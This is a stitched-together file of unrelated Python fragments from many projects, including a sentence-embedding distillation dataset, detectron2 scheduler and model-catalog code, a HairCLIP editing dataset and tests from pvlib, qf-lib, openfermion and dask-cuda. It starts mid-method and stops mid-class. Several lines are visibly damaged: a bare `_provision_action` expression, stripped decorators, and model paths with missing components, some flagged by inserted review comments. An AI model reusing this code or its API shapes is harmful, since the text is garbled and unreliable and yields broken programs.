            if ((max_sentences is not None) and (max_sentences > 0) and (len(sentences_map) >= max_sentences)):
                break
        if (len(sentences_map) == 0):
            return
        self.num_sentences += sum([len(sentences_map[sent]) for sent in sentences_map])
        dataset_id = len(self.datasets)
        self.datasets.append(list(sentences_map.items()))
        self.datasets_iterator.append(0)
        self.datasets_tokenized.append(False)
        # Weighted sampling: the corpus id appears `weight` times.
        self.dataset_indices.extend(([dataset_id] * weight))
    def generate_data(self):
        """Refill the cache with (target, source-embedding) training pairs."""
        source_sentences_list = []
        target_sentences_list = []
        for data_idx in self.dataset_indices:
            (src_sentence, trg_sentences) = self.next_entry(data_idx)
            source_sentences_list.append(src_sentence)
            target_sentences_list.append(trg_sentences)
        # Embed all sources in one batched call.
        src_embeddings = self.get_embeddings(source_sentences_list)
        for (src_embedding, trg_sentences) in zip(src_embeddings, target_sentences_list):
            for trg_sentence in trg_sentences:
                self.cache.append([[trg_sentence], src_embedding])
        random.shuffle(self.cache)
    def next_entry(self, data_idx):
        """Return the next (source, targets) pair from corpus `data_idx`.

        On first pass the targets are tokenized lazily with the student
        model and stored back in place; when the corpus is exhausted the
        iterator wraps around and the corpus is reshuffled.
        """
        (source, target_sentences) = self.datasets[data_idx][self.datasets_iterator[data_idx]]
        if (not self.datasets_tokenized[data_idx]):
            target_sentences = [self.student_model.tokenize(sent) for sent in target_sentences]
            self.datasets[data_idx][self.datasets_iterator[data_idx]] = [source, target_sentences]
        self.datasets_iterator[data_idx] += 1
        if (self.datasets_iterator[data_idx] >= len(self.datasets[data_idx])):
            # Full pass complete: everything is tokenized now; restart shuffled.
            self.datasets_iterator[data_idx] = 0
            self.datasets_tokenized[data_idx] = True
            random.shuffle(self.datasets[data_idx])
        return (source, target_sentences)
    def get_embeddings(self, sentences):
        """Teacher-embed `sentences`, using the embedding cache if enabled."""
        if (not self.use_embedding_cache):
            return self.teacher_model.encode(sentences, batch_size=self.batch_size, show_progress_bar=False, convert_to_numpy=False)
        # Only encode sentences not seen before.
        new_sentences = []
        for sent in sentences:
            if (sent not in self.embedding_cache):
                new_sentences.append(sent)
        if (len(new_sentences) > 0):
            new_embeddings = self.teacher_model.encode(new_sentences, batch_size=self.batch_size, show_progress_bar=False, convert_to_numpy=False)
            for (sent, embedding) in zip(new_sentences, new_embeddings):
                self.embedding_cache[sent] = embedding
        return [self.embedding_cache[sent] for sent in sentences]
    def __len__(self):
        # Total number of target sentences across all corpora.
        return self.num_sentences
    def __getitem__(self, idx):
        # Items are served from the pre-generated cache, regenerating it
        # when empty; `idx` is intentionally ignored.
        if (len(self.cache) == 0):
            self.generate_data()
        return self.cache.pop()
class PooledEmbeddingsAwaitable(Awaitable[torch.Tensor]):
    """Awaitable wrapper around a pooled-embeddings tensor computation."""
    def __init__(self, tensor_awaitable: Awaitable[torch.Tensor]) -> None:
        super().__init__()
        # Underlying awaitable that produces the pooled embeddings tensor.
        self._tensor_awaitable = tensor_awaitable
    def _wait_impl(self) -> torch.Tensor:
        """Block until the wrapped awaitable resolves; return its tensor."""
        ret = self._tensor_awaitable.wait()
        return ret
    def callbacks(self) -> List[Callable[([torch.Tensor], torch.Tensor)]]:
        # NOTE(review): self._callbacks is never assigned in this class; it
        # is presumably provided by the Awaitable base (via super().__init__).
        # Upstream torchrec exposes this accessor as a @property -- the
        # decorator may have been stripped from this file; confirm against
        # callers before changing.
        return self._callbacks
class TestExcelImport(TestCaseWithFileOutput):
    """Tests importing QFSeries/QFDataFrame containers from Excel templates."""
    # Directories for temporary output and the pre-built template workbooks.
    _tmp_dir = join(dirname(__file__), 'tmp')
    _templates_dir = join(dirname(__file__), 'dummies')
    def setUp(self):
        """Build reference containers matching the template files' contents."""
        dates = DatetimeIndex(date_range(start='2014-01-01', freq='d', periods=10))
        returns = np.arange(0, 1, 0.1)
        self.test_series = QFSeries(index=dates, data=returns)
        reversed_returns = returns[::(- 1)]
        test_series_reversed = QFSeries(index=dates, data=reversed_returns)
        # Two-column frame: ascending and descending returns on the same index.
        self.test_data_frame = concat([self.test_series, test_series_reversed], axis=1, join='inner')
        self.xl_importer = ExcelImporter()
    def tearDown(self):
        self.clear_tmp_dir()
    def tmp_dir(self):
        # NOTE(review): this (and templates_dir) may originally have been
        # decorated with @property; the base class contract decides whether
        # they are called as methods or read as attributes -- confirm.
        return self._tmp_dir
    def templates_dir(self):
        return self._templates_dir
    def test_import_series(self):
        """A single-series sheet round-trips into an equal QFSeries."""
        template_file_path = self.template_file_path(SINGLE_SHEET_ONE_SERIES)
        imported_series = self.xl_importer.import_container(file_path=template_file_path, container_type=QFSeries, starting_cell='A1', ending_cell='B10')
        assert_series_equal(self.test_series, imported_series)
    def test_import_dataframe(self):
        """A single-dataframe sheet round-trips into an equal QFDataFrame."""
        template_file_path = self.template_file_path(SINGLE_SHEET_ONE_DATA_FRAME)
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='A1', ending_cell='C10')
        assert_dataframes_equal(self.test_data_frame, imported_dataframe)
    def test_import_custom_dataframe(self):
        """Import with a custom (string) index and explicit column names."""
        template_file_path = self.template_file_path(SINGLE_SHEET_CUSTOM_INDEX_DATA_FRAME)
        df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='A10', ending_cell='C15', include_index=True, include_column_names=True)
        assert_dataframes_equal(df, imported_dataframe)
    def test_import_custom_dataframe_shifted(self):
        """Same data located away from A1; all index/column-name combinations."""
        template_file_path = self.template_file_path(SINGLE_SHEET_CUSTOM_INDEX_DATA_FRAME_SHIFTED)
        # With index and column names.
        df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='C10', ending_cell='E15', include_index=True, include_column_names=True)
        assert_dataframes_equal(df, imported_dataframe)
        # With index, default integer column names.
        df = QFDataFrame({0: [1, 2, 3, 4, 5], 1: [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='C11', ending_cell='E15', include_index=True, include_column_names=False)
        assert_dataframes_equal(df, imported_dataframe)
        # Without index, with column names.
        df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]})
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='D10', ending_cell='E15', include_index=False, include_column_names=True)
        assert_dataframes_equal(df, imported_dataframe)
        # Without index or column names.
        df = QFDataFrame({0: [1, 2, 3, 4, 5], 1: [10, 20, 30, 40, 50]})
        imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='D11', ending_cell='E15', include_index=False, include_column_names=False)
        assert_dataframes_equal(df, imported_dataframe)
class WarmupCosineLR(torch.optim.lr_scheduler._LRScheduler):
    """Cosine-annealed learning-rate schedule with an initial warmup phase.

    Deprecated: prefer an LRMultiplier built on fvcore's ParamScheduler.
    """

    def __init__(self, optimizer: torch.optim.Optimizer, max_iters: int, warmup_factor: float=0.001, warmup_iters: int=1000, warmup_method: str='linear', last_epoch: int=(- 1)):
        logger.warning('WarmupCosineLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!')
        self.max_iters = max_iters
        self.warmup_factor = warmup_factor
        self.warmup_iters = warmup_iters
        self.warmup_method = warmup_method
        super().__init__(optimizer, last_epoch)

    def get_lr(self) -> List[float]:
        # Warmup multiplier for the current iteration (1.0 once past warmup).
        factor = _get_warmup_factor_at_iter(self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor)
        # Half-cosine annealing term: 2.0 at iter 0 down to 0.0 at max_iters.
        cosine = 1.0 + math.cos(math.pi * self.last_epoch / self.max_iters)
        return [base_lr * factor * 0.5 * cosine for base_lr in self.base_lrs]

    def _compute_values(self) -> List[float]:
        # The base scheduler hooks this; our schedule is a pure function
        # of last_epoch, so simply delegate.
        return self.get_lr()
class ModelCatalog(object):
    """Store mappings from canonical names to official Caffe2 Detectron model URLs."""

    # Base URL for all Caffe2 Detectron assets.
    # NOTE(review): the original line was truncated to an unterminated string
    # literal (a syntax error); restored to the documented Detectron S3 prefix.
    S3_C2_DETECTRON_PREFIX = 'https://dl.fbaipublicfiles.com/detectron'
    # NOTE(review): several keys/values below contain doubled or leading slashes
    # ('ImageNetPretrained//R-50-GN.pkl', '/e2e_...'); it looks like numeric path
    # components were stripped from this copy — verify against upstream detectron2.
    C2_IMAGENET_MODELS = {'MSRA/R-50': 'ImageNetPretrained/MSRA/R-50.pkl', 'MSRA/R-101': 'ImageNetPretrained/MSRA/R-101.pkl', 'FAIR/R-50-GN': 'ImageNetPretrained//R-50-GN.pkl', 'FAIR/R-101-GN': 'ImageNetPretrained//R-101-GN.pkl', 'FAIR/X-101-32x8d': 'ImageNetPretrained//X-101-32x8d.pkl', 'FAIR/X-101-64x4d': 'ImageNetPretrained/FBResNeXt/X-101-64x4d.pkl', 'FAIR/X-152-32x8d-IN5k': 'ImageNetPretrained//X-152-32x8d-IN5k.pkl'}
    C2_DETECTRON_PATH_FORMAT = '{prefix}/{url}/output/train/{dataset}/{type}/model_final.pkl'
    C2_DATASET_COCO = 'coco_2014_train%3Acoco_2014_valminusminival'
    C2_DATASET_COCO_KEYPOINTS = 'keypoints_coco_2014_train%3Akeypoints_coco_2014_valminusminival'
    C2_DETECTRON_MODELS = {'/e2e_faster_rcnn_R-50-C4_1x': '/12_2017_baselines/e2e_faster_rcnn_R-50-C4_1x.yaml.01_33_49.iAX0mXvW', '/e2e_faster_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_1x.yaml.01_36_30.cUF7QR7I', '/e2e_faster_rcnn_R-101-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_R-101-FPN_1x.yaml.01_38_50.sNxI7sX7', '/e2e_faster_rcnn_X-101-32x8d-FPN_1x': '/12_2017_baselines/e2e_faster_rcnn_X-101-32x8d-FPN_1x.yaml.06_31_39.5MIHi1fZ', '/e2e_mask_rcnn_R-50-C4_1x': '/12_2017_baselines/e2e_mask_rcnn_R-50-C4_1x.yaml.01_45_57.ZgkA7hPB', '/e2e_mask_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_R-50-FPN_1x.yaml.01_48_14.DzEQe4wC', '/e2e_mask_rcnn_R-101-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_R-101-FPN_1x.yaml.02_31_37.KqyEK4tT', '/e2e_mask_rcnn_X-101-32x8d-FPN_1x': '/12_2017_baselines/e2e_mask_rcnn_X-101-32x8d-FPN_1x.yaml.06_35_59.RZotkLKI', '/e2e_mask_rcnn_R-50-FPN_2x_gn': 'GN//04_2018_gn_baselines/e2e_mask_rcnn_R-50-FPN_2x_gn_0416.13_23_38.bTlTI97Q', '/e2e_keypoint_rcnn_R-50-FPN_1x': '/12_2017_baselines/e2e_keypoint_rcnn_R-50-FPN_1x.yaml.08_42_54.kdzV35ao', '/rpn_R-50-C4_1x': '/12_2017_baselines/rpn_R-50-C4_1x.yaml.08_00_43.njH5oD9L', '/rpn_R-50-FPN_1x': '/12_2017_baselines/rpn_R-50-FPN_1x.yaml.08_06_03.Axg0r179', '/fast_R-50-FPN_1x': '/12_2017_baselines/fast_rcnn_R-50-FPN_1x.yaml.08_39_09.L3obSdQ2'}

    @staticmethod
    def get(name):
        """Resolve a catalog name to a download URL.

        Args:
            name: either 'Caffe2Detectron/COCO/<model>' or
                'ImageNetPretrained/<model>'.

        Raises:
            RuntimeError: if the name matches neither prefix.
        """
        if name.startswith('Caffe2Detectron/COCO'):
            return ModelCatalog._get_c2_detectron_baseline(name)
        if name.startswith('ImageNetPretrained/'):
            return ModelCatalog._get_c2_imagenet_pretrained(name)
        raise RuntimeError('model not present in the catalog: {}'.format(name))

    @staticmethod
    def _get_c2_imagenet_pretrained(name):
        """Build the URL for an ImageNet-pretrained backbone checkpoint."""
        prefix = ModelCatalog.S3_C2_DETECTRON_PREFIX
        name = name[len('ImageNetPretrained/'):]
        name = ModelCatalog.C2_IMAGENET_MODELS[name]
        url = '/'.join([prefix, name])
        return url

    @staticmethod
    def _get_c2_detectron_baseline(name):
        """Build the URL for a Caffe2 Detectron COCO baseline checkpoint."""
        name = name[len('Caffe2Detectron/COCO/'):]
        url = ModelCatalog.C2_DETECTRON_MODELS[name]
        # Keypoint models were trained on the keypoint split of COCO.
        if ('keypoint_rcnn' in name):
            dataset = ModelCatalog.C2_DATASET_COCO_KEYPOINTS
        else:
            dataset = ModelCatalog.C2_DATASET_COCO
        # RPN-only models store outputs under a different directory name.
        if ('/rpn_R-50-C4_1x' in name):
            model_type = 'rpn'
        else:
            model_type = 'generalized_rcnn'
        url = ModelCatalog.C2_DETECTRON_PATH_FORMAT.format(prefix=ModelCatalog.S3_C2_DETECTRON_PREFIX, url=url, type=model_type, dataset=dataset)
        return url
def balanceproof_from_envelope(envelope_message: EnvelopeMessage) -> BalanceProofSignedState:
    """Convert a signed envelope message into its BalanceProofSignedState view.

    The message must already carry a recovered sender (i.e. be signed);
    otherwise the balance proof would be unverifiable.
    """
    assert envelope_message.sender, 'envelope_message must be signed'
    canonical_identifier = CanonicalIdentifier(
        chain_identifier=envelope_message.chain_id,
        token_network_address=envelope_message.token_network_address,
        channel_identifier=envelope_message.channel_identifier,
    )
    return BalanceProofSignedState(
        nonce=envelope_message.nonce,
        transferred_amount=envelope_message.transferred_amount,
        locked_amount=envelope_message.locked_amount,
        locksroot=envelope_message.locksroot,
        message_hash=AdditionalHash(envelope_message.message_hash),
        signature=envelope_message.signature,
        sender=envelope_message.sender,
        canonical_identifier=canonical_identifier,
    )
class LatentsDatasetInference(Dataset):
    """Dataset of latent codes paired with hairstyle/color editing conditions.

    Depending on ``opts.editing_type`` ('hairstyle', 'color' or 'both') and
    ``opts.input_type`` ('<hairstyle>_<color>' with each part 'text' or
    'image'), each item yields either CLIP-tokenized text descriptions or
    reference-image tensors for the requested edits.  Unused condition slots
    are filled with placeholder ``torch.Tensor([0])`` values so every item has
    the same 6-tuple shape.
    """
    def __init__(self, latents, opts):
        self.latents = latents
        self.opts = opts
        # Hairstyle edits driven by text: load descriptions from file and strip
        # the trailing 9 characters (presumably the literal 'hairstyle' suffix,
        # re-appended later — TODO confirm against the description file format).
        if ((self.opts.editing_type in ['hairstyle', 'both']) and (self.opts.input_type.split('_')[0] == 'text')):
            with open(self.opts.hairstyle_description, 'r') as fd:
                self.hairstyle_description_list = fd.read().splitlines()
            self.hairstyle_list = [single_hairstyle_description[:(- 9)] for single_hairstyle_description in self.hairstyle_description_list]
        # Color edits driven by text: comma-separated descriptions from opts.
        if ((self.opts.editing_type in ['color', 'both']) and (self.opts.input_type.split('_')[(- 1)] == 'text')):
            self.color_list = [(single_color_description.strip() + ' ') for single_color_description in self.opts.color_description.split(',')]
        # Hairstyle edits driven by reference images.
        if ((self.opts.editing_type in ['hairstyle', 'both']) and (self.opts.input_type.split('_')[0] == 'image')):
            self.out_domain_hairstyle_img_path_list = sorted(train_utils.make_dataset(self.opts.hairstyle_ref_img_test_path))
        # Color edits driven by reference images.
        if ((self.opts.editing_type in ['color', 'both']) and (self.opts.input_type.split('_')[(- 1)] == 'image')):
            self.out_domain_color_img_path_list = sorted(train_utils.make_dataset(self.opts.color_ref_img_test_path))
        # Normalize reference images to [-1, 1].
        self.image_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])
    def manipulate_hairstyle(self, index):
        # NOTE(review): if input_type's first part is neither 'text' nor
        # 'image', the locals below are never bound and the return raises
        # NameError — presumably opts are validated upstream; confirm.
        if (self.opts.input_type.split('_')[0] == 'text'):
            # Placeholders for the unused color condition slots.
            color_text_embedding_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
            color_tensor_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
            hairstyle_tensor_list = [torch.Tensor([0]) for i in range(len(self.hairstyle_list))]
            selected_hairstyle_description_list = [(single_hairstyle_description + 'hairstyle') for single_hairstyle_description in self.hairstyle_list]
            # CLIP-tokenize each full description; one token tensor per edit.
            hairstyle_text_embedding_list = [torch.cat([clip.tokenize(selected_hairstyle_description)])[0] for selected_hairstyle_description in selected_hairstyle_description_list]
        elif (self.opts.input_type.split('_')[0] == 'image'):
            color_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            color_tensor_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            selected_hairstyle_description_list = ['hairstyle_out_domain_ref' for i in range(self.opts.num_of_ref_img)]
            # Randomly sample reference images (non-deterministic per access).
            hairstyle_tensor_list = [self.image_transform(Image.open(random.choice(self.out_domain_hairstyle_img_path_list))) for i in range(self.opts.num_of_ref_img)]
        return (self.latents[index], hairstyle_text_embedding_list, color_text_embedding_list, selected_hairstyle_description_list, hairstyle_tensor_list, color_tensor_list)
    def manipulater_color(self, index):
        # Mirror of manipulate_hairstyle for the color condition; the same
        # possibly-unbound-locals caveat applies here.
        if (self.opts.input_type.split('_')[(- 1)] == 'text'):
            hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
            hairstyle_tensor_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
            color_tensor_list = [torch.Tensor([0]) for i in range(len(self.color_list))]
            selected_color_description_list = [(single_color_description + 'hair') for single_color_description in self.color_list]
            color_text_embedding_list = [torch.cat([clip.tokenize(selected_color_description)])[0] for selected_color_description in selected_color_description_list]
        elif (self.opts.input_type.split('_')[(- 1)] == 'image'):
            hairstyle_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            hairstyle_tensor_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            color_text_embedding_list = [torch.Tensor([0]) for i in range(self.opts.num_of_ref_img)]
            selected_color_description_list = ['color_out_domain_ref' for i in range(self.opts.num_of_ref_img)]
            color_tensor_list = [self.image_transform(Image.open(random.choice(self.out_domain_color_img_path_list))) for i in range(self.opts.num_of_ref_img)]
        return (self.latents[index], hairstyle_text_embedding_list, color_text_embedding_list, selected_color_description_list, hairstyle_tensor_list, color_tensor_list)
    def manipulater_hairstyle_and_color(self, index):
        # Cartesian product of hairstyle and color conditions: each hairstyle
        # entry is repeated once per color entry (and vice versa), so all
        # returned lists have len(hairstyle) * len(color) elements.
        (returned_latent, hairstyle_text_embedding_list, _, selected_hairstyle_description_list, hairstyle_tensor_list, _) = self.manipulate_hairstyle(index)
        (_, _, color_text_embedding_list, selected_color_description_list, _, color_tensor_list) = self.manipulater_color(index)
        hairstyle_text_embedding_final_list = [hairstyle_text_embedding for hairstyle_text_embedding in hairstyle_text_embedding_list for i in color_text_embedding_list]
        color_text_embedding_final_list = [color_text_embedding for i in hairstyle_text_embedding_list for color_text_embedding in color_text_embedding_list]
        selected_description_list = [f'{selected_hairstyle_description}-{selected_color_description}' for selected_hairstyle_description in selected_hairstyle_description_list for selected_color_description in selected_color_description_list]
        hairstyle_tensor_final_list = [hairstyle_tensor for hairstyle_tensor in hairstyle_tensor_list for i in color_tensor_list]
        color_tensor_final_list = [color_tensor for i in hairstyle_tensor_list for color_tensor in color_tensor_list]
        return (returned_latent, hairstyle_text_embedding_final_list, color_text_embedding_final_list, selected_description_list, hairstyle_tensor_final_list, color_tensor_final_list)
    def __len__(self):
        # Number of latent codes (first axis of the latents tensor/array).
        return self.latents.shape[0]
    def __getitem__(self, index):
        # Dispatch on the configured editing type; returns None for any
        # other value of opts.editing_type.
        if (self.opts.editing_type == 'hairstyle'):
            return self.manipulate_hairstyle(index)
        elif (self.opts.editing_type == 'color'):
            return self.manipulater_color(index)
        elif (self.opts.editing_type == 'both'):
            return self.manipulater_hairstyle_and_color(index)
class DumperProvider(ProviderWithAttachableRC, ABC):
    """Abstract base for providers that produce a ``Dumper`` for a request.

    Subclasses implement :meth:`_provide_dumper`; the outer wrapper first
    validates the request against this provider's request checker.
    """
    # NOTE(review): this bare expression looks like a truncated line — most
    # likely an assignment such as ``_provision_action = ...`` binding the
    # provision action for DumperRequest. Confirm against the upstream source;
    # as written it raises NameError at class-creation time.
    _provision_action
    def _outer_provide_dumper(self, mediator: Mediator, request: DumperRequest):
        # Reject requests this provider is not configured to handle, then
        # delegate to the subclass implementation.
        self._request_checker.check_request(mediator, request)
        return self._provide_dumper(mediator, request)
    def _provide_dumper(self, mediator: Mediator, request: DumperRequest) -> Dumper:
        # Abstract hook: subclasses return the Dumper for this request.
        ...
# NOTE(review): the decorator line was truncated to a bare `.parametrize(...)`
# (a syntax error); restored the standard `@pytest.mark.parametrize` form.
@pytest.mark.parametrize('temp_model', ['sapm_temp', 'faiman_temp', 'pvsyst_temp', 'fuentes_temp', 'noct_sam_temp'])
def test_infer_temp_model(location, sapm_dc_snl_ac_system, pvwatts_dc_pvwatts_ac_pvsyst_temp_system, pvwatts_dc_pvwatts_ac_faiman_temp_system, pvwatts_dc_pvwatts_ac_fuentes_temp_system, pvwatts_dc_pvwatts_ac_noct_sam_temp_system, temp_model):
    """ModelChain infers the correct temperature model from system parameters."""
    # Map each expected temperature-model name to a fixture system whose
    # parameters should make ModelChain infer exactly that model.
    dc_systems = {'sapm_temp': sapm_dc_snl_ac_system, 'pvsyst_temp': pvwatts_dc_pvwatts_ac_pvsyst_temp_system, 'faiman_temp': pvwatts_dc_pvwatts_ac_faiman_temp_system, 'fuentes_temp': pvwatts_dc_pvwatts_ac_fuentes_temp_system, 'noct_sam_temp': pvwatts_dc_pvwatts_ac_noct_sam_temp_system}
    system = dc_systems[temp_model]
    # temperature_model is left unspecified so ModelChain must infer it.
    mc = ModelChain(system, location, aoi_model='physical', spectral_model='no_loss')
    assert (temp_model == mc.temperature_model.__name__)
    assert isinstance(mc, ModelChain)
def test_estimates_expectation_value_pauli_nonoise():
    """PhaseFitEstimator recovers the exact expectation value from a noiseless
    phase function for a two-eigenvalue (Pauli) operator.
    """
    # Operator with eigenvalues -1/+1 and known amplitudes on each eigenstate.
    evals = numpy.array([-1, +1])
    true_amps = numpy.array([0.2, 0.8])
    # <O> = sum_k a_k * E_k
    true_expectation_value = numpy.dot(evals, true_amps)
    estimator = PhaseFitEstimator(evals)
    sim_points = estimator.get_simulation_points()
    # Noiseless phase function g(t) = sum_k a_k * exp(i * E_k * t),
    # evaluated at the estimator's requested sample times.
    phase_function = numpy.array([numpy.sum([(amp * numpy.exp(((1j * ev) * time))) for (ev, amp) in zip(evals, true_amps)]) for time in sim_points])
    # Removed a leftover debug print of phase_function that polluted test output.
    test_expectation_value = estimator.get_expectation_value(phase_function)
    assert numpy.isclose(true_expectation_value, test_expectation_value)
def _test_dataframe_shuffle(backend, protocol, n_workers, _partitions):
    """Exercise explicit-comms shuffle over a local Dask cluster.

    Args:
        backend: 'pandas' or 'cudf' — dataframe library under test.
        protocol: cluster communication protocol (e.g. 'tcp', 'ucx').
        n_workers: number of Dask workers to start.
        _partitions: if True, shuffle on a constant '_partitions' column so all
            rows land in the first output partition; otherwise shuffle on 'key'.
    """
    if (backend == 'cudf'):
        cudf = pytest.importorskip('cudf')
    with LocalCluster(protocol=protocol, dashboard_address=None, n_workers=n_workers, threads_per_worker=1, worker_class=IncreasedCloseTimeoutNanny, processes=True) as cluster:
        with Client(cluster) as client:
            all_workers = list(client.get_worker_logs().keys())
            comms.default_comms()
            # Fixed seed keeps the shuffled key column reproducible.
            np.random.seed(42)
            df = pd.DataFrame({'key': np.random.random(100)})
            if (backend == 'cudf'):
                df = cudf.DataFrame.from_pandas(df)
            if _partitions:
                # Constant partition id: every row maps to output partition 0.
                df['_partitions'] = 0
            # Sweep input/output partition counts and batch sizes.
            for input_nparts in range(1, 5):
                for output_nparts in range(1, 5):
                    ddf = dd.from_pandas(df.copy(), npartitions=input_nparts).persist(workers=all_workers)
                    for batchsize in ((- 1), 1, 2):
                        with dask.config.set(explicit_comms_batchsize=batchsize):
                            ddf = explicit_comms_shuffle(ddf, (['_partitions'] if _partitions else ['key']), npartitions=output_nparts, batchsize=batchsize).persist()
                            assert (ddf.npartitions == output_nparts)
                            if _partitions:
                                # All rows must be in partition 0; the rest empty.
                                assert_eq(ddf.partitions[0].compute(), df)
                                assert all(((len(ddf.partitions[i].compute()) == 0) for i in range(1, ddf.npartitions)))
                            else:
                                # Each partition only holds keys that hash to it,
                                # and the overall contents are preserved.
                                result = ddf.map_partitions(check_partitions, output_nparts).compute()
                                assert all(result.to_list())
                                expected = df.sort_values('key')
                                got = ddf.compute().sort_values('key')
                                assert_eq(got, expected)
def find_occurrences(project, resource, offset, unsure=False, resources=None, in_hierarchy=False, task_handle=taskhandle.DEFAULT_TASK_HANDLE):
    """Find occurrences of the name at ``offset`` in ``resource``.

    Searches ``resources`` (all project Python files when None) and returns
    the locations produced by ``_find_locations``.  When ``unsure`` is truthy,
    matches that cannot be confirmed are included as well.
    """
    name = worder.get_name_at(resource, offset)
    pymodule = project.get_pymodule(resource)
    primary, pyname = evaluate.eval_location2(pymodule, offset)

    # Predicate for unresolved matches: include them iff `unsure` was requested.
    def is_match(occurrence):
        return unsure

    finder = occurrences.create_finder(
        project,
        name,
        pyname,
        unsure=is_match,
        in_hierarchy=in_hierarchy,
        instance=primary,
    )
    resources = project.get_python_files() if resources is None else resources
    job_set = task_handle.create_jobset('Finding Occurrences', count=len(resources))
    return _find_locations(finder, resources, job_set)
class TypeFixture():
    """Reusable collection of pre-built mypy types for unit tests.

    Constructs a small class hierarchy (A <: object, B/C <: A, D, E <: F, ...),
    generic classes G/H/GS, type variables, literals, tuples and aliases, all
    sharing a single ``variance`` for the generic parameters.
    """
    def __init__(self, variance: int=COVARIANT) -> None:
        # --- builtins.object and its instance ---
        self.oi = self.make_type_info('builtins.object')
        self.o = Instance(self.oi, [])

        # Helper: a TypeVar bounded by `upper_bound` with the fixture variance.
        def make_type_var(name: str, id: int, values: list[Type], upper_bound: Type, variance: int) -> TypeVarType:
            return TypeVarType(name, name, id, values, upper_bound, AnyType(TypeOfAny.from_omitted_generics), variance)

        # --- type variables (negative ids are "fresh"/inference variables) ---
        self.t = make_type_var('T', 1, [], self.o, variance)
        self.tf = make_type_var('T', (- 1), [], self.o, variance)
        self.tf2 = make_type_var('T', (- 2), [], self.o, variance)
        self.s = make_type_var('S', 2, [], self.o, variance)
        self.s1 = make_type_var('S', 1, [], self.o, variance)
        self.sf = make_type_var('S', (- 2), [], self.o, variance)
        self.sf1 = make_type_var('S', (- 1), [], self.o, variance)
        self.u = make_type_var('U', 3, [], self.o, variance)

        # --- special types ---
        self.anyt = AnyType(TypeOfAny.special_form)
        self.nonet = NoneType()
        self.uninhabited = UninhabitedType()

        # --- abstract classes F, F2, F3 (F3 inherits F) ---
        self.fi = self.make_type_info('F', is_abstract=True)
        self.f2i = self.make_type_info('F2', is_abstract=True)
        self.f3i = self.make_type_info('F3', is_abstract=True, mro=[self.fi])

        # --- builtins: tuple, type, bool, str, function ---
        self.std_tuplei = self.make_type_info('builtins.tuple', mro=[self.oi], typevars=['T'], variances=[COVARIANT])
        self.type_typei = self.make_type_info('builtins.type')
        self.bool_type_info = self.make_type_info('builtins.bool')
        self.str_type_info = self.make_type_info('builtins.str')
        self.functioni = self.make_type_info('builtins.function')

        # --- plain class hierarchy: A; B, C <: A; D; E <: F; E2/E3 <: F, F2 ---
        self.ai = self.make_type_info('A', mro=[self.oi])
        self.bi = self.make_type_info('B', mro=[self.ai, self.oi])
        self.ci = self.make_type_info('C', mro=[self.ai, self.oi])
        self.di = self.make_type_info('D', mro=[self.oi])
        self.ei = self.make_type_info('E', mro=[self.fi, self.oi])
        self.e2i = self.make_type_info('E2', mro=[self.f2i, self.fi, self.oi])
        self.e3i = self.make_type_info('E3', mro=[self.fi, self.f2i, self.oi])

        # --- generic classes: G[T], G2[T], H[S, T], GS[T, S] <: G[S], GS2[S] <: G[S] ---
        self.gi = self.make_type_info('G', mro=[self.oi], typevars=['T'], variances=[variance])
        self.g2i = self.make_type_info('G2', mro=[self.oi], typevars=['T'], variances=[variance])
        self.hi = self.make_type_info('H', mro=[self.oi], typevars=['S', 'T'], variances=[variance, variance])
        self.gsi = self.make_type_info('GS', mro=[self.gi, self.oi], typevars=['T', 'S'], variances=[variance, variance], bases=[Instance(self.gi, [self.s])])
        self.gs2i = self.make_type_info('GS2', mro=[self.gi, self.oi], typevars=['S'], variances=[variance], bases=[Instance(self.gi, [self.s1])])
        self.std_listi = self.make_type_info('builtins.list', mro=[self.oi], typevars=['T'], variances=[variance])

        # --- frequently used Instance shortcuts ---
        self.std_tuple = Instance(self.std_tuplei, [self.anyt])
        self.type_type = Instance(self.type_typei, [])
        self.function = Instance(self.functioni, [])
        self.str_type = Instance(self.str_type_info, [])
        self.bool_type = Instance(self.bool_type_info, [])
        self.a = Instance(self.ai, [])
        self.b = Instance(self.bi, [])
        self.c = Instance(self.ci, [])
        self.d = Instance(self.di, [])
        self.e = Instance(self.ei, [])
        self.e2 = Instance(self.e2i, [])
        self.e3 = Instance(self.e3i, [])
        self.f = Instance(self.fi, [])
        self.f2 = Instance(self.f2i, [])
        self.f3 = Instance(self.f3i, [])

        # --- instantiations of the generic classes ---
        self.ga = Instance(self.gi, [self.a])
        self.gb = Instance(self.gi, [self.b])
